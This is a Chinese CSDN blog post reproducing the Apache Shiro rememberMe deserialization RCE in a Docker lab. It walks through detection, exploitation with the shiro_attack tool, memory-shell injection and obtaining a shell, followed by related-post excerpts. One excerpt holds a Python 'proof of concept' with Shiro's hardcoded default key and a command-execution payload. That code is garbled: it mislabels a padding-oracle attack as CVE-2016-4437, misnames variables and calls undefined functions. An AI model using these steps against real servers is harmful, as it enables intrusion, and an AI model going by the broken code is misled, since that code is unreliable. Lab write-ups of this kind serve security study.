shrio反序列化--漏洞复现

已于 2023-08-02 09:41:38 修改
阅读量958 收藏 1
点赞数
CC 4.0 BY-SA版权
文章标签: docker 容器 安全
于 2023-06-12 18:45:51 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/DM_LL/article/details/130457604

shrio反序列化–漏洞复现

一、漏洞原理

Apache Shiro框架提供了记住密码的功能(RememberMe),用户登录成功后会生成经过加密并编码的cookie。在服务端对rememberMe的cookie值,先base64解码然后AES解密再反序列化,就导致了反序列化RCE漏洞。
那么,Payload产生的过程:
命令=>序列化=>AES加密=>base64编码=>RememberMe Cookie值
在整个漏洞利用过程中,比较重要的是AES加密的密钥,如果没有修改默认的密钥那么就很容易就知道密钥了,Payload构造起来也是十分的简单
影响版本: Apache Shiro < 1.2.4
漏洞挖掘: 响应包中包含rememberMe=deleteMe字段

二、环境搭建

docker-compose up -d  启动docker
docker-compose ps     查看运行状态
docker-compose down   关闭镜像(使用完后关闭)
docker pull medicean/vulapps:s_shiro_1  获取docker镜像  
systemctl restart docker    重启docker
docker run -d -p 8081:8080 medicean/vulapps:s_shiro_1     启动docker镜像

在这里插入图片描述
在这里插入图片描述
访问:http://192.168.123.138:8081/ 环境搭建成功
在这里插入图片描述

三、漏洞复现

尝试登录,发现相应包出现rememberMe=deleteMe字段;
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-66ci0Qp0-1686566347035)(D:\Typora\imgs\image-20230502000945355.png)]
使用burp抓取当前页面数据包,在cookie中添加rememberMe=1,在响应包中显示Set-Cookie: rememberMe=deleteMe,说明存在shiro框架,可能存在漏洞

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-ua9a6VWT-1686566347036)(D:\Typora\imgs\image-20230502004312965.png)]
使用shiro反序列化漏洞综合利用工具:双击直接使用或者在当前目录中开启cmd,然后输入以下命令:javaw -jar shiro_attack-4.5.5-SNAPSHOT-all.jar等方式,在data文件夹中存在一个shiro_keys.txt的文件,可自行添加key在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
命令执行查看权限
在这里插入图片描述
注入内存马试试
在这里插入图片描述

连接成功,getshell
在这里插入图片描述

漏洞复现】shiro 反序列化 (CVE-2016-4437)
飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘
08-14 818
Apache Shiro是一个强大且易用的Java安全框架,执行身份验证、授权、密码和会话管理。使用Shiro易于理解的API,开发者可以快速、轻松地获得任何应用程序,从最小的移动应用程序到最大的网络和企业应用程序。...
shiro反序列化的简单漏洞复现
weixin_63920195的博客
08-23 1930
192.168.15.166作为漏洞靶场192.168.15.129为接收反弹shell的主机。
漏洞复现】Shiro 反序列化漏洞
2301_80115097的博客
11-08 2517
Apache Shiro是一款开源安全框架,提供身份验证、授权、密码学和会话管理。Shiro框架直观、易用,同时也能提供健壮的安全性。Apache Shiro 1.2.4及以前版本中,加密的用户信息序列化后存储在名为remember-me的Cookie中。攻击者可以使用Shiro的默认密钥伪造用户Cookie,触发Java反序列化漏洞,进而在目标机器上执行任意命令。该款工具特别适合初学者,配置了各种OA漏洞利用板块,还有shiro、struts2等框架漏洞漏洞利用板块,还有一键执行命令的功能!!
shiro反序列化漏洞复现
m0_52789121的博客
04-07 4821
目录 简介: 靶场环境 漏洞复现 一、手工复现 二、图形化工具 简介: Apache Shiro是一个强大易用的Java安全框架,提供了认证、授权、加密和会话管理等功能。Shiro框架直观、易用,同时也能提供健壮的安全漏洞原理: Apache Shiro框架提供了记住密码的功能(RememberMe),用户登录成功后会生成经过加密并编码的cookie。在服务端对rememberMe的cookie值,先base64解码然后AES解密再反序列化,就导致了反序列化RCE漏洞。 那么,Payload
Apache Shiro 反序列化漏洞复现(CVE-20164437)
又菜又爱倒腾的博客
10-29 1831
#Apache Shiro 反序列化漏洞(CVE-20164437)# 一、漏洞简介 Shiro 是 Java 的一个安全框架,执行身份验证、授权、密码、会话管理 shiro默认使用了CookieRememberMeManager,其处理cookie的流程是:得到rememberMe的cookie值–>Base64解码–>AES解密–>反序列化 然而AES的密钥是硬编码的,就导致了攻击者可以构造恶意数据造成反序列化的RCE漏洞。 二、漏洞影响 影响版本 Apache Shiro <=
shiro反序列化漏洞复现(CVE-2016-4437)
m0_70349048的博客
05-19 777
cookie的key为RememberMe,cookie的值是经过相关信息进行序列化,然后使用AES加密(对称),最后再使用Base64编码处理。,这意味着攻击者只要通过源代码找到AES加密的密钥,就可以构造一个恶意对象,对其进行序列化,AES加密,Base64编码,然后将其作为cookie的Remember Me字段发送,Shiro将RememberMe进行解密并且反序列化,最终造成反序列化漏洞。将生成的payload复制到请求包cookie的位置, 发包。可以看到,已经能够远程执行任意命令了。
shiro反序列化复现.zip
08-03
2. **测试环境**:可能包含一个预配置的服务器环境,模拟了存在反序列化漏洞的Shiro应用,使得用户可以在可控的环境中测试漏洞复现过程。 3. **文档**:解释了如何使用提供的工具和代码,以及漏洞的工作原理和修复...
漏洞复现——shiro反序列化
小林说安全的博客
05-22 5809
漏洞复现——shiro反序列化
Shiro反序列化漏洞
qq_40882763的博客
02-21 3028
Shiro反序列化漏洞 目录 Shiro反序列化漏洞 1.1 漏洞介绍 1.1.1 漏洞简介 1.1.2 影响版本 1.1.3 漏洞原理 1.1.4 漏洞特征 1.1.5 漏洞影响   1.2 环境配置 1.3 漏洞检测 ​​1.4 漏洞利用 1.5 防御措施 参考: 一、Shrio反序列化导致命令执行(Shiro-550 CVE-2016-4437) 1.1 漏洞介绍 1.1.1 漏洞简介   Apache Shiro是一款开源企业常见JAVA安全框架,提供...
漏洞复现】 Shiro 反序列化漏洞
zkaqlaoniao的博客
11-09 3992
Apache Shiro是一款开源安全框架,提供身份验证、授权、密码学和会话管理。Shiro框架直观、易用,同时也能提供健壮的安全性。Apache Shiro 1.2.4及以前版本中,加密的用户信息序列化后存储在名为remember-me的Cookie中。攻击者可以使用Shiro的默认密钥伪造用户Cookie,触发Java反序列化漏洞,进而在目标机器上执行任意命令。该款工具特别适合初学者,配置了各种OA漏洞利用板块,还有shiro、struts2等框架漏洞漏洞利用板块,还有一键执行命令的功能!!
CVE-2016-4437 Shiro反序列化漏洞复现
weixin_45260839的博客
05-15 3038
CVE-2016-4437 Shiro反序列化漏洞复现
shiro漏洞复现
黑白的博客
09-05 4423
声明 写这个的目的,也是为了学习,分享,交流,希望能被大家看到,我们可以互相学习,希望大家以学习为目的进行漏洞复现,如果有评论的话,我也会认真的看,指出我的不足,我也会认真的改正,嘿嘿,毕竟这条路需要一直学习新的知识,话不多说 漏洞描述 Apache Shiro框架提供了记住密码的功能(RememberMe),用户登录成功后会生成经过加密并编码的cookie。在服务端对rememberMe的cookie值,先base64解码然后AES解密再反序列化,就导致了反序列化RCE漏洞。 那么,Payload产生的过
shiro反序列化漏洞复现(CVE-2016-4437 )
wangzhifei1的博客
01-19 2385
Apache Shiro是一个强大且易于使用的Java安全框架,提供认证、授权、加密以及会话管理功能。CVE-2016-4437具体涉及了Apache Shiro在使用记住我(RememberMe)功能时的反序列化漏洞
Apache Shiro 反序列化漏洞复现(CVE-2016-4437)
Ceciiiilia的博客
02-08 354
攻击机:172.16.0.33(win10) 靶机:172.16.8.118(kali) docker环境: 地址:https://github.com/vulhub/vulhub/tree/master/shiro/CVE-2016-4437 docker-compose up -d 服务启动后,访问http://your-ip:8080可使用admin:vulhub进行登录。 exp: 地址:https://github.com/insightglacier/Shiro_expl.
shrio反序列化漏洞综合复现
qq_36585338的博客
09-25 287
shrio反序列化漏洞综合复现
shiro反序列化
热门推荐
weixin_48776804的博客
05-12 1万+
shiro反序列化
shiro反序列化复现
最新发布
03-11
### 关于Apache Shiro 反序列化漏洞复现 对于Apache Shiro存在过的反序列化漏洞,特别是Shiro-721 (CVE-2016-4437),其主要问题是由于`rememberMe`功能中的cookie处理不当所引起的。当应用程序启用了此特性并配置了不安全的默认设置时,攻击者可以构造恶意输入来触发Java对象的反序列化进程,在特定条件下执行任意代码。 要重现该漏洞的影响,通常需要满足以下几个条件: - 应用程序使用了易受攻击版本的Apache Shiro库。 - `rememberMe`选项被启用,并且客户端能够控制发送给服务器端的身份认证Cookie值。 - 攻击者拥有对目标环境的有效了解,比如知道使用的类加载器路径或者JVM参数等细节信息[^1]。 下面是一个简化版的概念验证(PoC)流程用于说明如何利用这个缺陷进行测试(请注意这仅限于合法授权下的安全性评估环境中): #### 准备工作 确保实验环境已安装好所需的依赖项,包括但不限于: - Java开发工具包(JDK) - Python脚本语言解释器及其相关模块如pycrypto, requests等 #### 构造恶意负载 编写Python脚本来创建一个经过特殊编码后的会话ID字符串作为HTTP请求的一部分提交给Web应用服务接口。这里涉及到几个关键技术点: - 使用Padding Oracle Attack技巧绕过HMAC校验机制; - 将精心设计好的字节数组转换成Base64格式以便嵌入到浏览器Cookies字段里; ```python from Crypto.Cipher import AES import base64 import os def padding_oracle_attack(ciphertext): """模拟padding oracle attack过程""" block_size = 16 iv = ciphertext[:block_size] prev_block = iv plaintext_blocks = [] for i in range(len(ciphertext)//block_size - 1)[::-1]: current_cipher_block = ciphertext[i*block_size:(i+1)*block_size] intermediate_values = bytearray([0]*block_size) # 对每个byte位置尝试所有可能的情况直到找到正确的pad value为止 for j in reversed(range(block_size)): found_valid_byte = False for guess_value in range(256): modified_iv = list(iv) # 设置当前位为预期的pad number加上猜测值减去实际pad数量的结果 pad_num = block_size-j for k in range(j+1): modified_iv[k] ^= ((pad_num ^ intermediate_values[j-k]) & 0xFF) modified_iv[j] ^= (((guess_value ^ pad_num))& 0xFF) forged_ciphertext = bytes(modified_iv)+current_cipher_block try: decrypt_and_check_padding(forged_ciphertext) found_valid_byte=True break except Exception as e: continue if not found_valid_byte: raise ValueError('Failed to find valid byte') intermediate_values[j]=(found_valid_byte^pad_num)&0xff decrypted_plaintext=bytes([(intermediate_values[b]^iv[b])for b in range(block_size)]) plaintext_blocks.append(decrypted_plaintext.hex()) return ''.join(reversed(plaintext_blocks)) def create_malicious_cookie(): key=b'kPH+bIxk5D2deZiIxcaaaA==' cipher=AES.new(base64.b64decode(key),AES.MODE_CBC,b'\x00'*16) malicious_payload='T(java.lang.Runtime).getRuntime().exec("touch /tmp/shell")'.encode() padded_data=malignant_payload+(chr((len(malignant_payload)%16)).encode()*(-len(malignant_payload)%16)) encrypted=cipher.encrypt(padded_data) cookie_token=f'defaultSerializedSession={base64.urlsafe_b64encode(padding_oracle_attack(encrypted)).strip(b"=").decode()}' print(cookie_token) if __name__=='__main__': create_malicious_cookie() ``` 上述代码片段展示了通过Padding Oracle Attack技术篡改加密后的session token内容的方法之一。需要注意的是这段代码仅为教学目的而准备,并不应该应用于任何非法场合。 成功运行以上脚本之后将会得到一个新的伪造cookies令牌,将其附加至向受害站点发起的新一轮访问请求头中即有可能造成远程命令注入危害后果。 重要提醒:上述操作只适用于研究学习用途,请勿滥用!
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值